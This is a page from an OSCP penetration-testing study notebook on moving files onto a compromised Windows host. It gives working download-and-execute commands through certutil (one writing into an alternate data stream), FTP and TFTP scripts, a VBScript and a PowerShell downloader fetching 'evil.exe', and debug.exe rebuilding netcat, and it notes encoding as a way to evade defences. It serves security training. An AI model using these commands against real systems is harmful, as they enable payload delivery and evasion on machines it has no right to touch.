✏️
OSCP
  • $WhoAmI?
  • Manual
  • NMAP
    • NSE Scripts
  • Steganography
  • Services Enumeration
    • Postgres Psql
    • SNMTP - 199
    • SSH - 22
    • TELNET - 23
    • RDP - 3389
    • DISTCCD - 3632
    • IMAP - 143
    • TFTP - UDP69
    • FTP - 21
    • HTTP 80/443
      • LFI to RCE
      • ShellShock
      • GIT
      • XXE, SQLI, CRLF, CSV,
      • CMS
      • Locations
        • Interested Linux Files
        • Logs
      • Command Injection
      • Remote File Inclusion (RFI)
      • File Upload Vulnerabilities
      • Remote Code Execution (RCE)
      • SQL Injection
      • Local File Inclusion (LFI)
        • LFI TO RCE
      • Web Enumeration
        • Patator BruteForce
        • ShellShock
        • Nikto
        • Anonymous Scanning
        • Fuzzers
        • DNS
    • SMB 139/445
      • SMB Exploit
      • SMB Enumerate
      • Send and Execute
      • Samba 2.2.x
    • RPC - 111
    • NFS
    • SNMP 161
    • SMTP 25
    • VNC - 5800
    • MYSQL - 3306
    • POP3 - 110
    • LDAP - 389
    • IRC 667
    • Java-RMI 1098/1099/1050
    • 1433 - MSSQL
  • Linux
    • Shells Linux
    • File Transfer
    • Linux Priv Esc
    • Fix Shell
    • Upload
    • Restricted Shell
  • Windows
    • File Transfer
    • Reverse Shell Cheatsheet
      • Full TTYs
      • Shells - Windows
      • MSFVENOM
    • Post Explotation
      • Nishang
      • Kernel Exploits
      • Service Exploits
      • Unquoted service paths
      • Mimikatz
    • BackDoors
    • EternalBlue MS17-010
    • Windows - Download and execute methods
    • Windows Priv Exc
    • Priv Esc Tools
    • ByPass UAC
      • Bypassing default UAC settings manually c++
      • EventVwr Bypass UAC Powershell
      • ByPass UAC Metasploit
      • Bypassing UAC with Kali’s bypassuac
      • Bypass UAC on Windows Vista
  • Password Attack
    • Intercepting Login Request
    • Windows Hashes
    • Linux Hashes
    • Wordlists
    • Brute Force Password Attacks & Cracking
    • Hashes
  • Network Pivoting Techniques
  • Buffer OverFlow
    • 6. Getting Shell
    • 5. Finding Bad Characters
    • 4. Overwrite EIP
    • 3. Finding The Offset
    • 2. Fuzzing
    • 1. Spiking
  • Downloads
  • Online Websites
  • Privilege Escalation History
  • Exploit
    • Unreal IRC
    • Sambacry
    • Shellshock
    • Padding Oracle Attack
Powered by GitBook
On this page
  • Transferring Files to Windows
  • Certutil.exe
  • Download
  • Alternate data streams
  • Encode
  • Decode
  • FTP
  • TFTP
  • VBScript
  • PowerShell
  • Debug.exe

Was this helpful?

  1. Windows

File Transfer

PreviousWindowsNextReverse Shell Cheatsheet

Last updated 3 years ago

Was this helpful?

Transferring Files to Windows

Transferring files to Linux is usually pretty easy. We can use netcat, wget, or curl, which most systems have as default. But windows does not have these tools.

Best Website:

Certutil.exe

Paths:

  • C:\Windows\System32\certutil.exe

  • C:\Windows\SysWOW64\certutil.exe

Download

Download and save 7zip to disk in the current folder.

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Usecase:Download file from Internet Privileges required:User OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Mitre: Download and save 7zip to disk in the current folder.

certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Usecase:Download file from Internet Privileges required:User OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Mitre:

Alternate data streams

Download and save a PS1 file to an Alternate Data Stream (ADS).

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

Encode

Command to encode a file using Base64

certutil -encode inputFileName encodedOutputFileName

Decode

Command to decode a Base64 encoded file.

certutil -decode encodedInputFileName decodedOutputFileName
certutil --decodehex encoded_hexadecimal_InputFileName

FTP

Most windows machines have a ftp-client included. But we can't use it interactively since that most likely would kill our shell. So we have get around that. We can however run commands from a file. So what we want to do is to echo out the commands into a textfile. And then use that as our input to the ftp-client. Let me demonstrate.

On the compromised machine we echo out the following commands into a file

echo open 192.168.1.101 21> ftp.txt
echo USER asshat>> ftp.txt
echo mysecretpassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt

Then run this command to connect to the ftp

ftp -v -n -s:ftp.txt

Of course you need to have a ftp-server configured with the user asshat and the password to mysecretpassword.

TFTP

Works by default on:

Windows XP

Windows 2003

A TFTP client is installed by default on windows machines up to Windows XP and Windows 2003. What is good about TFTP is that you can use it non-interactively. Which means less risk of losing your shell.

Kali has a TFTP server build in. You can server up some files with it like this

atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart

Now you can put stuff in /srv/tftp and it will be served. Remember that TFTP used UDP. So if you run netstat it will not show it as listening.

You can see it running like this

netstat -a -p UDP | grep udp

So now you can upload and download whatever from the windows-machine like this

tftp -i 192.160.1.101 GET wget.exe

If you like to test that the tftp-server is working you can test it from Linux, I don't think it has a non-interactive way.

tftp 192.160.1.101
GET test.txt

I usually put all files I want to make available in /srv/tftp

If you want to make sure that the file was uploaded correct you can check in the syslog. Grep for the IP like this:

grep 192.168.1.101 /var/log/syslog

VBScript

Here is a good script to make a wget-clone in VB.

If it doesn't work try piping it through unix2dos before copying it.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

You then execute the script like this:

cscript wget.vbs http://192.168.10.5/evil.exe evil.exe

PowerShell

This is how we can download a file using PowerShell. Remember since we only have a non-interactive shell we cannot start PowerShell.exe, because our shell can't handle that. But we can get around that by creaing a PowerShell-script and then executing the script:

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.1.101/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Now we invoke it with this crazy syntax:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Debug.exe

This is a crazy technique that works on windows 32 bit machines. Basically the idea is to use the debug.exe program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like netcat. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.

Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:

upx -9 nc.exe

Now it only weights 29 kb. Perfect. So now let's disassemble it:

wine exe2bat.exe nc.exe nc.txt

Now we just copy-past the text into our windows-shell. And it will automatically create a file called nc.exe

Usecase:Download file from Internet and save it in an NTFS Alternate Data Stream Privileges required:User OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Mitre:

Usecase:Encode files to evade defensive measures Privileges required:User OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Mitre:

Usecase:Decode files to evade defensive measures Privileges required:User OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Mitre: Command to decode a hexadecimal-encoded file decodedOutputFileName

Usecase:Decode files to evade defensive measures Privileges required:User OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Mitre:

https://lolbas-project.github.io/#
T1105
T1105
T1096
T1027
T1140
T1140